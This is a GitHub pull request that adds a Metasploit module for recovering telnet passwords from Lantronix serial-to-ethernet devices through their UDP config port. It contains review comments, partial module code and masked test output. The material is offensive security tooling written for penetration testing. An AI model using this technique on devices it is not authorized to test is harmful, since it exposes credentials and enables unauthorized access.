Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with HTTPS or Subversion.

Download ZIP

Loading…

added Lantronix telnet password recovery module #906

Merged
merged 2 commits into from

2 participants

jgor Juan Vazquez
jgor

Description: This module retrieves the setup record from Lantronix serial-to-ethernet devices via the config port (30718/udp, enabled by default) and extracts the telnet password.

Lantronix device configuration is performed via telnet to port 9999, optionally protected by a 4-character password. Existing MSF module auxiliary/scanner/telnet/lantronix_telnet_version gets the version banner of this telnet service. This new module adds the ability to retrieve the credentials for the telnet service.

The code was modeled after modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb. It has been tested against a Lantronix CoBox-E2 device running the latest firmware (v5.8.0.1), reset to factory defaults and configured with a telnet password. It is based on PoC code of mine that I have successfully run against at least two additional Lantronix models, and theoretically will work on any device that uses the standard Lantronix discovery/config port (30718/udp) and supports accessing setup records through this port.

I can make a test device reachable if necessary. Let me know if more info is needed.

Juan Vazquez
Collaborator

Hi jgor,

First of all, thanks for your contribution. Access to a test device would be awesome to test the module. If you can't provide it, a pcap capture with the module in action would be necessary to verify which the module is working. Please feel free to contact at juan.vazquez [at] metasploit.com in case you could provide access to a test device.

jgor

Test device connection details emailed.

...auxiliary/scanner/telnet/lantronix_telnet_password.rb
@@ -0,0 +1,111 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+###
Juan Vazquez Collaborator

I think this comment L10-L15 can be deleted

jgor
jgor added a note

Yep, forgot to get rid of that from the sample module.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
...auxiliary/scanner/telnet/lantronix_telnet_password.rb
((9 lines not shown))
+
+###
+#
+# This sample auxiliary module simply displays the selected action and
+# registers a custom command that will show up when the module is used.
+#
+###
+class Metasploit4 < Msf::Auxiliary
+ include Msf::Exploit::Remote::Udp
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'Lantronix Telnet Password Recovery',
+ 'Version' => '$Revision: 1 $',
Juan Vazquez Collaborator

This was for svn purposes, can be deleted

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Juan Vazquez jvazquez-r7 commented on the diff
...auxiliary/scanner/telnet/lantronix_telnet_password.rb
((77 lines not shown))
+ end
+
+ if password
+ print_good("#{rhost} - Telnet password found: #{password.to_s}")
+ report_auth_info({
+ :host => rhost,
+ :port => 9999,
+ :sname => 'telnet',
+ :duplicate_ok => false,
+ :pass => password,
+ })
+ end
+
+ end
+
+ def parse_reply(pkt)
Juan Vazquez Collaborator

I don't fully understand the parse_reply function, why don't just search if it's a setup_record (seems it is when setup_record[3] == 0xf9), and if it is a setup record, return the password?

Sure I'm forgetting things.... really I just can test the setup response from the device put available by jgor (thanks :))

jgor
jgor added a note

The pkt[1] stuff (host info of the response from recvfrom()) is something I found in other existing modules, I assume it's a convention for trimming up ipv6 addresses. But now that I look at it again I don't use that value anyway, whoops...so it can all be removed. Thanks!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Juan Vazquez
Collaborator

On the other hand I've tested and the module is mainly working (thanks jgor!), awaiting for jgor update for comments.

remsf  auxiliary(lantronix_telnet_password) > rexploit
[*] Reloading module...

[+] xx.xx.xx.xx - Telnet password found: xxxxxx
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf  auxiliary(lantronix_telnet_password) > hosts

Hosts
=====

address         mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------         ---  ----  -------  ---------  -----  -------  ----  --------
xx.xx.xx.xx             Unknown                    device         

msf  auxiliary(lantronix_telnet_password) > creds

Credentials
===========

host            port  user  pass  type      active?
----            ----  ----  ----  ----      -------
xx.xx.xx.xx  9999        xxxxxx  password  true

jgor

Agreed on all fronts, 1) the sample module comment should be deleted, 2) the svn version line can go away, 3) all the pkt[1] code in parse_reply() should be deleted. I'm a bit new to this process, do I make the changes on my side and re-commit or do you need to make the changes? Thanks!

Juan Vazquez
Collaborator

You can do the changes by yourself, and when you're ready, from your local clone of your git repo, on the same branch you have used to open this pull request just do:

git commit -am "description for changes"
git push origin branch_name

And this pull request will be updated automatically :) Feel free to ask if you have any doubts about this. Hopefully soon all we will be github masters! :D

jgor

Done, thanks for the pointers!

Juan Vazquez jvazquez-r7 merged commit e22059d into from
Juan Vazquez
Collaborator

Awesome! merged :) really thanks jgor!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Commits on Oct 17, 2012
  1. jgor
  2. jgor

    Merge branch 'module-lantronix_telnet_password' of github.com:jgor/me…

    jgor authored
    …tasploit-framework into module-lantronix_telnet_password
This page is out of date. Refresh to see the latest.
Showing with 0 additions and 0 deletions.
Something went wrong with that request. Please try again.